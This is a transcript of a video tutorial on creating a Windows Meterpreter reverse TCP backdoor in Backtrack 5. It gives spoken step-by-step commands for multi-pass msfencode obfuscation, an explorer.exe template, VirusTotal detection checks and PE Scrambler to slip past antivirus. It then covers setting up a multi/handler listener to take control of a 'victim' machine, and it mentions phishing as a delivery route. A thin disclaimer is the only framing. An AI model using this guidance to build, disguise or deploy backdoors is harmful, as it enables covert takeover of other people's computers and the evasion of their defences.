Hey guys, it's the Ghost with the Ghost Productions. Today we're going to do another Backtrack 5 tutorial, as always. And in this one we're going to learn how to encode a payload, um, a backdoor, trojan, if you will. Um, and with this backdoor, it's going to be an executable file that we will be able to execute on a victim's computer or a victim machine and start a MSF listener or Metasploit Framework listener and be able to start a reverse TCP. Anyways, I don't condone this for any illegal or malicious activity. Anything you do, I'm not held responsible for. With that being said, let's get started. First off, we're going to open up two terminals. This first one, I'm going to go ahead and full screen it. We're going to type in MSF encode and do a -L to list all the encodings. And in the second one, we're going to type in, well, I've got a few of them I've already done. The first one I want to show you would be just a regular encoding. It used to be a really good one, and here's your encoding list. I'm going to go ahead and tile it over here. The first one, first off, we're going to type in MSF Payload and Windows Meterpreter Reverse TCP. It's one of the best ways to attack a machine. It gives you really great access. So I suggest using this one. And then we set the L host to 192.168.1.104, which is my current IP address. And the L port to whatever you want it to be. I set it to 4444 because it just seems to work. And then we're going to capital R and then pipe over to MSF encode, so we can go ahead, after we create the payload, we want to encode it, and we can do this all in one process. We do MSF encode -C 100 times. It's that's the count 100 times, and then E is the encoding type. We're going to do x86 Shikata Ganai, and that used to be a really great encoding, but it's being detected more and more nowadays. -T, which is type for exe, and then we're going to go ahead and put the output to backdoor. I'm going to name backdoor 1, and we'll go ahead and click enter on that, and I'll drop over this right here. These are all the different encodings. This is how great they work. See how Shikata Ganai is the excellent one. It's a polymorphic XOR, additive feedback, blah blah blah. There's a few different encodings here. We're going to touch base on just probably Shikata Ganai and then x64 XOR, since they both are XOR, and this one's rated normal. And the whole point of using these encodings is so that antiviruses will not pick them up, or are not as likely to pick them up. It's already encoded, and it was saved to my home folder. What we're going to do is we're going to go to a site that's going to be able to test these different encodings, which is going to be VirusTotal. And we're going to go open up 3 instances of it, and I think yeah, VirusTotal. You don't have to open up 3 instances. I'm just kind of demonstrating for you. The first one, we're going to go ahead and select a file. It's just www.virustotal.com, and it allows you to test different things to see if it's, malware or whatever. And here we see backdoor 1. Double click on it. It loads it up, and we're going to go ahead and scan it. Now, I'm not expecting this to be too well. They're going to test it against however many different antivirus systems. We'll see right here. This is the detection ratio. You want this number to be low and this number to be high. The lower this number and the higher this number, the greater the chance that you're going to get through. But if a computer has antivirus on it and detects your backdoor, then you're pretty much out of luck. So this is what the encoding process is for. And while that is testing, it'll take a couple minutes. I'm going to go back to where we just encoded, and you want to go through and make sure that there's no errors in the encoding process. And you see we encoded it 100 times, So that should be a pretty good encoding, right? Well, we shall see. I'm going to go to MSF encode. Alright, we're going to do MSF encode, or we'll do the exact same thing. We make the payload right here, then we do MSF encode. I use the Shikata Gainai, and exactly all this before here is exactly what it was. And the type, we're going to make it raw because we want it to be a raw output. Okay, so this is the type of file you want to put. Do raw, then pipe it over to MSF encode again, and we're going to do 23. I failed to mention that the count is 23 on the encoding here. We want to do a 23 count over here, and then the encoding type is going to be x64 XOR, and then the type is going to be EXE. You always have to remember to make it raw. You can encode it 4,000 times, 4,000 different encoders. Not saying it's going to work, but then you have to make it raw. And the last encoding, you want to do type EXE because we want it to be an executable file for Windows. Most machines that we're attacking will be Windows. And then we're going to put the output to backdoor number 2. Alright, go ahead and click enter on this. It will take a minute to encode. We'll jump back over here and check it out. 8 out of 12 so far. That's not too great. Let's see. McAfee. Oh no. McAfee, Microsoft, Norman. Oh, look at all this. I mean, it's pathetic. Viper. You can't really get past Viper. I say you really can't get past one called ESET, but I found a way to get past ESET with the third one we're about to do. So it's not looking too good. That means if you try to deploy this on a computer and it has antivirus software, it's most likely going to detect it. We'll go back up. It's at 29 out of 40. We've got 2 more antiviruses to test, I believe. They usually test 42. And our second one's done. So we'll go ahead and go over here and load it up. And backdoor number 2, click open, and we'll scan it. It's loading up the file. Alright, it'll start scanning it in a minute. It usually tested against 42 different antivirus. I'm not sure why it didn't, but it tested against 40 this time, it looks like. And if it tests against 42, you'll come up to a 30 to 42 ratio. You know, that's 3/4. That's around 3/4 right now. It's about 3/4 of the antivirus will detect it. That's not a good ratio. And here we're just starting off. It doesn't look so good, but it may get a little bit better. I'll leave it right here. We're going to go and encode one more time. Sorry about that, guys. Now, this time, when we encode, we're going to add one more aspect to it. We're going to add a trusted file for Windows and make the encoding of this whole thing mimic it. And I chose explore.exe. If you don't know what that is, that's what Windows it's based on, an Explorer. It's an environment that allows you to click through Windows and explore different file systems and stuff. Anyways, so we'll do MSF payload just like we did before, and then just like we did on the second one, MSF encode, count 23, encryption type would be, or encoding type would be Shikata Gainai, -T, type would be raw, pipe it over to MSF encode again 23 times, encoding would be x64 XOR, -T, which is going to be an EXE this time, but now we're adding a -X, which is, this is the path to my explorer.exe. Now, once we have explorer.exe, yeah, see, look over here, 30 out of 41. So that was even worse. You know, we even encoded it a little bit better. Anyways, we go to once we add in the -X and then the path to our explorer.exe, we're going to make the output go over to backdoor number 3, or whatever you want to name your backdoor. You can name it whatever you want to. This is just what your output file is going to be. And now we're going to go ahead and encode this one. And by doing this, encoding it twice and then mimicking the the format of the explore.exe, my understanding, that's how it works. Go through the man page for the MSF encode and the MSF encode help and the payload help and all that. You just read about it. You'll see the different types of encodings you have. I gotta full screen this. You'll see the different types of encodings there are, and how to use them is up to you. I would stay away from the manual ones until you understand exactly what you're doing. And there's a lot of tools in here. You can actually make your own encodings and submit them, or make your own encodings and not submit them, is what I would do. And kind of get a feel for it. Just search out Metasploit Framework. It's your friend. I'm going to exit out of this. We've encoded it. It looks like it's been successful. I didn't see any errors, and we're good. I'm going to exit out of this, go to our last instance, and backdoor 3, open it up, and we're going to scan it. So we're looking for a detection ratio of something better than 3/4 of the way through, you know what I mean? As you saw on this one, it's 30 out of 41. I could have sworn it would have been better. And then 29 out of 40. These are both pretty much, dead in the water. 3/4 of the way through. Done, son. We'll exit out of this one here. We'll go back. You see there's a 0 of 1. So we're starting off pretty good. 0 out of 4. Oh, 1 out of 6. So we're off to a good start, and I hope you guys understand how to do this. Just pause the video, go back, and take a look at it, and try all these commands yourself. And I will show you what the exe files or the backdoors look like, and where to find them, and how to start the listener after you do this. So you don't want to submit all your stuff to VirusTotal. VirusTotal does report to all these antivirus systems, and they're gonna be like, hey, here's what people are trying to figure out. If this is going to get past your antivirus systems, or here's different files that might be in question, blah blah blah. So I don't use this too often. I will test different encoding types, and then I'll tweak them. That way the hash isn't exactly the same. So you see here, 15 out of 42. That's around 1/4. I'm not really that great at math, but it's about 1/4 of what it could have been. So that's a pretty good encoding that we just did. Go ahead and exit out of this. I'll show you that encoding one more time so you guys can take a peek. That was we started a payload, MSF payload, Windows Interpreter, reverse TCP. I set the L host to whatever your IP address is, L port to 4444 for me. That part doesn't really matter in the encoding process. That's just setting up your payload. And then I did a capital R and then piped it over to MSF encode. And then we did a count of 23. The encoding type was x86 Shikata Ganai, and then -T. We made it a raw file because we wanted it to be exactly the same, just so we can pipe it back over to MSF encode again. And then we used the count 23 and then encode x86 or x64 XOR, and then type would be exe, and then we did a -X, and then we added in the where explorer.exe. All you have to do is download explorer.exe, or if you're dual booting, you can find explorer.exe by going through your Dolphin File Manager, and that should be in Windows System 32 and then System, I believe, or something like that, and you'll find explorer.exe. This isn't a dual boot. I actually have this installed on a hard drive, so I can't go back and show you. Had it been 3 days ago, I would have been able to do it. Anyways, so this is the path of your explorer.exe file that you kept, and then this is your output. We named it backdoor 3. It saves them directly in the home folder. I'll take these backdoors and put them in my payloads folder. Open up my payloads. You should see my trash can. I did like 40 payloads earlier, so should have impressed you guys. I had a bunch of payloads here. Anyways, these are your 3 backdoors. Obviously these are junk. I'm gonna go ahead and delete these. And I don't know what you're doing. delete those out of there. This is my explorer.exe file, and this is PES Scrambler, or PE Scrambler. You can take this and run it in a Windows machine. If you have antivirus and you try to move this over here, it's okay. You can take your backdoor and you can take PE Scrambler, run it on a Windows machine, and then do not run the backdoor, but turn your antivirus off, move the backdoor over to the machine, and then you can scramble it again, and you can make it even more undetectable. But the only problem with that is your backdoor is most not likely not going to work. And I kind of got this video, and I have PE Scrambler here because of Screen Freezer. He's one of my subscribers, and him. He did a video on how to use PE Scrambler to make an undetectable backdoor. Check out his video; it's pretty good, guys. But in my experiences with it, my backdoors didn't work, and this right here is a tested backdoor by me, and I know it does work. So, not bashing him at all. He puts forth a great effort, and I love watching his videos. Anyways, guys, so that's how to set up your backdoor. And once it's executed on a Windows machine, all you have to do, I know I'm making this video a little bit long, but I want to show you how to do the MSF console. Type in MSF console. It's going to take a minute to run. You're going to start a listener, and with it executed on a Windows machine, you're going to be able to listen for the information that backdoor is putting out. And once you catch it, you'll be able to actually start the interpreter reverse TCP and take control of that computer. And there's a lot of fun stuff you can do. Watch one of my other videos, how to own a Windows 7 machine. That's exactly what I do. I own a Windows 7 machine. It's got, I think, it had a vast antivirus or something like that, and we got into it through a phishing attack, I believe, or man-in-the-middle attack, and then we set up a backdoor and everything on it. So when you get into MSF console, you want to type in use multi-handler, and we're going to set payload to Windows interpreter reverse TCP, and we're going to set lhost, that's the local host, set localhost to whatever 192 dot. You need to set it to the exact same IP address, which is your IP address that you set the backdoor to, 192.168.1.104, I believe it was for mine. And we're going to do set lport to the exact same port number we did, which mine was 4444. And then just to make sure that you got everything all handled, do show options. And you look here and you see that these are required and they all have something in them. So we got current setting process, blah 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 here, the listen address, a listening port, and then you can also set wildcards. But we won't get too much into wildcards right now. After you do this and you see that you've got everything running right, you want to type in exploit. And you've successfully encoded a backdoor or a payload or a trojan, whatever you want to call it, and you have a listener set up. So as soon as you execute that on another machine, you will start receiving data. Alright guys, well let me mention real quick. You can't do this over a WAN or a wide area network because you have to do something called port forwarding, and let me just leave it to this. We're going to leave this into a local area network. As long as this is in a local area network at your own house, set in your own setting, this will work. If you really want to do it over the internet or through a WAN, then you need to go online and look up how to do such things. I'm probably not going to be able to teach those, at least not on YouTube, because I think it may violate YouTube policies. I just don't want the information being out in the wrong hands and people, doing malicious things. So this is to get you started. I'm sure you can figure out how to do the rest of the stuff later. Another great video by the Ghost Productions. Tell me what you think about it, and look forward to more videos coming up soon. Thanks, guys.